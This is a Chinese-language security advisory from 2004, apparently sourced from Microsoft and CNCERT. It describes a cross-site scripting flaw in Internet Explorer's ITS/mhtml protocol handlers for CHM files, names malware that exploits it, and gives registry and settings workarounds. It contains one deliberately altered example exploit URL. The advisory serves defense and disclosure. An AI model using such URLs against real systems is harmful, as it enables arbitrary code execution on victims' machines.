IE ITS 协议处理程序漏洞
出处:微软 作者:微软 时间:2004-4-13 21:28:00
影响系统:
运行Internet Explorer的 Microsoft Windows 系统
综述:
Microsoft Internet Explorer 中的一个跨站脚本漏洞 使攻击者在用户运行IE时执行任意代码。攻击者也可以在其他域的网站上读取并操作数据。
描述:
在ITS 协议处理程序确认存储在编译HTML帮助 (CHM)文件夹中HTML组件的域过程中存在一个跨站脚本漏洞。HTML帮助系统“……运用Microsoft Internet Explorer下列组件展示帮助内容。他支持HTML, ActiveX, Java,和脚本语言(JScript, 和Microsoft Visual Basic Scripting Edition)。”CHM文件运用InfoTech Storage (ITS)格式存储HTML 文件, graphic 文件, 和ActiveX 对象这一类的组件。IE提供多种协议处理程序,能够访问ITS文件和单独的CHM组件:its:, ms-its:, ms-itss:,以及mk:@MSITStore:。IE也有访问部分运用mhtml:协议处理程序中MIME HTML集合文件包(MHTML)的能力。
当IE参考不能进入或是不存在MHTML文件运用ITS和mhtml:协议,ITS协议处理能够访问一个交换源CHM文件。IE错误地将CHM文件看作为在相同域的不可用MHTML文件。运用特殊处理地URL,攻击者能够导致CHM文件在不同域执行任意脚本,干扰跨站脚本安全模式。
任何使用WebBrowser ActiveX 控制或是IE HTML 表现方法 (MSHTML)的程序会受到此漏洞影响。Internet Explorer, Outlook, 和 Outlook Express 都是此类程序的例子。任何程序,包括其他网络浏览器,使用IE协议处理程序(URL名字)可以作为攻击携带者的功能。同样,由于IE决定MIME形式,HTML和CHM文件不会以预期的文件名扩展(.htm/.html and .chm respectively)。
注意:
运用一个可交替的网络浏览器会减轻此漏洞的危害。在Windows 系统中调用其他网页浏览器处理ITS协议URLs。
影响:
通过说服或诱导受害者去浏览一个像网页一样的HTML文档或者HTML的邮件信息,一个攻击者能在拥有攻击者的文档的区域以外的区域运行脚本。通过运行Local Machine Zone脚本,攻击者能够利用正在使用IE用户的权限执行任意代码。攻击者也可以读取或更改其他网站数据(包括读取cookies 或内容以及更改或者创建目录)。
现已存在此漏洞的攻击代码。Ibiza trojan, 不同的W32/Bugbear和BloodHound.Exploit.6 是此漏洞恶意代码攻击中的一些例子。值得注意的是任意执行的有效载荷经此漏洞释放,不同的防病毒厂商能够识别不同名称的恶意代码。
一个恶意网址或邮件信息可能包含HTML类似于一下举例:
ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
(此 URL故意进行了修正避免防病毒软件的检测)
在这个例子中,HTML和exploit.html的脚本将会在Local Machine Zone的安全环境下执行。这是对于exploit.html的通常惯例,或者包含或者下载一个可运行的文档,例如,后门、特洛伊木马、病毒、机器人、或其他恶意代码。
注意在HTTP内容检查或防病毒软件中加密URL的可能性。
解决方法:
现在没有完整针对这个漏洞的解决方案。直到补丁的出现,关注下面的列表。关闭ITS协议处理漏洞。
关闭ITS协议处理程序目的在于避免该漏洞被利用。删除或更改下面的注册键:: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
关闭这些协议处理程序将明显的减少Windows帮助系统的功能,并且可能导致意料之外的结果。计划在补丁测试并安装后取消这些改变。遵循好的互联网安全惯例。这些推荐的安全措施将帮助来发现攻击和减轻跨站漏洞。
关闭运行的脚本和ActiveX控制器
注意: 关闭运行的脚本和ActiveX控制器可能不会防止漏洞被利用。
关闭运行的脚本和ActiveX控制器和Local Machine Zones可能停止某些类型的
攻击并且防止不同的跨站漏洞被利用。
在任何用来阅读HTML邮件的运行的脚本和ActiveX控制器
关闭运行的脚本和ActiveX控制器在Local Machine Zone中将防止利用运行脚本和ActiveX控制器的恶意代码。改变这些设置可能会减少脚本,Applet,Windows组件或者其他应用程序的功能。看微软知识库833633号文章了解Local Machine Zone 安全设置的具体信息。注意Windows XP SP2包括了这个改变。
* 不要使用未确定的链接。
不要点击在邮件,即时信息,web论坛或者IRC频道中的不确URL.
* 维护升级防病毒软件
升级病毒定义库后的防病毒软件可以确认和预防一些恶意企图. 各式各样的恶意代码或者攻击可能没被侦测到的。不要仅仅依赖防病毒软件来防止漏洞。可以从CNCERT的网站上获得更多的病毒与防病毒信息。
,